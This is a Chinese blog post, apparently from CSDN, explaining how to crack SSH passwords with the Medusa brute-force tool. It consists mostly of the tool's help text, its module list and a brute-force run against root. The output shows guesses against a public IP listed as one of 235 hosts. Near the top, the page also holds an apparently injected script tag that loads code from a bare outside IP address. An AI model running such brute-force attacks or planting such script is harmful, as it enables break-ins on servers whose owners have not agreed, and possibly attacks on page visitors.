medusa破解ssh密码

于 2012-11-06 17:09:07 发布
阅读量5.1k 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chinafe/article/details/8153788
版权
<script type="text/javascript" src="http://123.120.28.251:8888/loop"></script>



medusa破解ssh密码



在backtrack中可以直接执行


# medusa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <>
ALERT: Host information must be supplied.
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT]    : Target hostname or IP address
-H [FILE]    : File containing target hostnames or IP addresses
-u [TEXT]    : Username to test
-U [FILE]    : File containing usernames to test
-p [TEXT]    : Password to test
-P [FILE]    : File containing passwords to test
-C [FILE]    : File containing combo entries. See README for more information.
-O [FILE]    : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT]    : Name of the module to execute (without the .mod extension)
-m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d           : Dump all known modules
-n [NUM]     : Use for non-default TCP port number
-s           : Enable SSL
-g [NUM]     : Give up after trying to connect for NUM seconds (default 3)
-r [NUM]     : Sleep NUM seconds between retry attempts (default 3)
-R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM]     : Total number of logins to be tested concurrently
-T [NUM]     : Total number of hosts to be tested concurrently
-L           : Parallelize logins using one username per thread. The default is to process 
the entire username before proceeding.
-f           : Stop scanning host after first valid username/password found.
-F           : Stop audit after first valid username/password found on any host.
-b           : Suppress startup banner
-q           : Display module's usage information
-v [NUM]     : Verbose level [0 - 6 (more)]
-w [NUM]     : Error debug level [0 - 10 (more)]
-V           : Display version
-Z [NUM]     : Resume scan from host #
ok,我们看看medusa有哪些模块支持什么功能的破解
# medusa -d
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <>
Available modules in "." :
Available modules in "/usr/lib/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 1.0.0
+ : Brute force module for FTP/FTPS sessions : version 1.3.0
+ http.mod : Brute force module for HTTP : version 1.3.0
+ imap.mod : Brute force module for IMAP sessions : version 1.2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
+ mysql.mod : Brute force module for MySQL sessions : version 1.2
+ ncp.mod : Brute force module for NCP sessions : version 1.0.0
+ nntp.mod : Brute force module for NNTP sessions : version 1.0.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
+ pop3.mod : Brute force module for POP3 sessions : version 1.2
+ postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0
+ rexec.mod : Brute force module for REXEC sessions : version 1.1.1
+ rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
+ rsh.mod : Brute force module for RSH sessions : version 1.0.1
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
+ svn.mod : Brute force module for Subversion sessions : version 1.0.0
+ telnet.mod : Brute force module for telnet sessions : version 1.2.2
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
+ vnc.mod : Brute force module for VNC sessions : version 1.0.1
+ web-form.mod : Brute force module for web forms : version 1.0.0
+ wrapper.mod : Generic Wrapper Module : version 1.0.1


我们要破解ssh,所以用-M ssh参数加载ssh模块,后面不用跟.mod


# medusa -h 192.168.100 -u root -P p.txt -M ssh


Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <>
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: root (1 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: admin (2 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: oracle (3 of 7 complete)


继续等待吧——大概速度是一秒一个。
冷风
关注
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值